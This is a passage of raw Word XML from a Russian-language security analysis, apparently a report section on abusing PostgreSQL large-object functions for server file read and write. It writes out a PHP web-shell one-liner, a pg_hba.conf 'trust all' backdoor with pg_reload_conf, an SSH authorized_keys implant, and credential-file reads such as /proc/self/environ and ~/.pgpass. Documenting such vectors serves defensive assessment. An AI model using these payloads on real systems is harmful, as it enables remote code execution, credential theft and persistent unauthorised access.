        <w:t xml:space="preserve"> — идентично 3.6.3: file-read с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t>-процесса, разведка конфигов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t>), компрометация секретов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~/.pgpass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SSL-ключи), path discovery. Не дублирую полный разбор — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3 → «Что произойдёт»</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BE67E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-вектор (Payload C) — три конкретные цели</w:t>
      </w:r>
      <w:r>
        <w:t>, у каждой своя применимость:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F062220" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web-shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;?php system($_GET['c']); ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/shell.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Применимо когда веб-сервер (Apache/nginx + php-fpm) работает на том же хосте что и PG — типичный сценарий в legacy LAMP-стеке, monorepo-deployments, docker-compose с shared volume. Эффект — RCE как user веб-сервера (обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), что в комбинации с локальными privesc-CVE даёт root. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не работает</w:t>
      </w:r>
      <w:r>
        <w:t>, если веб-сервер в отдельном контейнере/хосте — PG может писать в свой uid, но не в файловую систему другого хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395801DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Перезапись `pg_hba.conf`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>local all all trust\nhost all all 0.0.0.0/0 trust\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_reload_conf()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (требует superuser или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_signal_backend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Эффект — персистентный backdoor: любой клиент подключается без пароля под любой ролью (включая superuser). Применимо когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — owner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (package-based инсталляции на Debian/Ubuntu/RHEL — типично). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> если конфиг managed-инструментом (Patroni, k8s-operator), который перезаписывает его обратно при следующей синхронизации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C5CC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`~/.ssh/authorized_keys`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — добавление публичного SSH-ключа атакующего в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/postgresql/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (home postgres-пользователя на Linux). Эффект — SSH-доступ к хосту как user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без участия PostgreSQL вообще. Применимо когда: (а) на хосте установлен и запущен sshd; (б) postgres-user имеет shell (не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nologin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); (в) home-директория существует и содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.ssh/</w:t>
      </w:r>
      <w:r>
        <w:t>. Дальше pivot через любой sudo / kernel CVE → root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8FB11C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все три цели write-вектора оставляют чистый артефакт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — см. «Легитимность».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A33D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3E848" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import/lo_export/lo_get/lo_create/lo_put/lo_from_bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверные функции работы с PostgreSQL large objects (специальный тип хранения BLOB-данных через OID). Все обёрнуты вокруг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OpenTransientFile()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>read()/write()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для файловых вариантов и операций над системной таблицей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для in-DB вариантов. Никакого sandboxing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2308C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_create(0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт пустой LO с auto-assigned OID. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_put(oid, offset, bytea)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пишет байты в LO по offset. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_from_bytea(0, data)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбинация двух: один вызов, OID + content сразу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1435B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает весь bytea LO. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export(oid, path)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пишет содержимое LO в файл на ФС под uid postgres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585DD10C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Двухшаговая read-семантика (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → OID → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — артефакт исторического дизайна API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда сохраняет копию файла в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_largeobject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (физическая таблица), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> читает оттуда. Это значит read через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> удваивает использование диска (файл в LO + ответ клиенту) и оставляет след в каталоге.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2229A735" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Вложенный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get(lo_import('/etc/passwd'))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает потому, что обе функции — обычные SQL-функции, выполняются в одном expression-context. OID возвращается из inner-вызова, передаётся в outer без промежуточного состояния.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33005AAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   До PG 11 — все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-функции работы с ФС были superuser-only. PG 11 ввёл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>две разные predefined roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_export</w:t>
      </w:r>
      <w:r>
        <w:t>). Их выдают независимо — наличие одной не подразумевает наличие другой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA337BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Два независимых вектора с разными правами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239D99BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read-вектор (lo_import + lo_get):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F9FDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PG 14–17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0844773E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> predefined role ИЛИ superuser. До PG 11 — только superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F418A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_get</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам по себе доступен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — читает любой LO в текущей БД, если LO уже существует (от чужого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Это даёт побочный вектор: если в кластере уже есть LO с интересным содержимым (бэкапы, импортированные документы) — атакующий читает их без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A237EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Путь к файлу должен быть readable для uid postgres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F487569" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-вектор (lo_export):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD0FB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PG 14–17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0BFC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_write_server_files`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> predefined role ИЛИ superuser. До PG 11 — только superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B298557" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Это другая роль, не путать с `pg_read_server_files`.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Выдаются они независимыми </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наличие read-роли не открывает write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ED2ADB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_write_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выдаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ещё реже</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — даже большинство DBA её не имеют. Чаще встречается у backup-операторов и operators-ролей в managed-кластерах (где роль доступна только внутренней инфраструктуре провайдера).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F91DBA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Целевая директория должна быть writable для uid postgres: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если веб-сервер с тем же uid или мир-writable), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/postgresql/.ssh/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (home postgres-пользователя), иногда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/postgresql/16/main/pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если postgres — owner конфига; типично для package-based инсталляций Debian/Ubuntu).</w:t>
      </w:r>
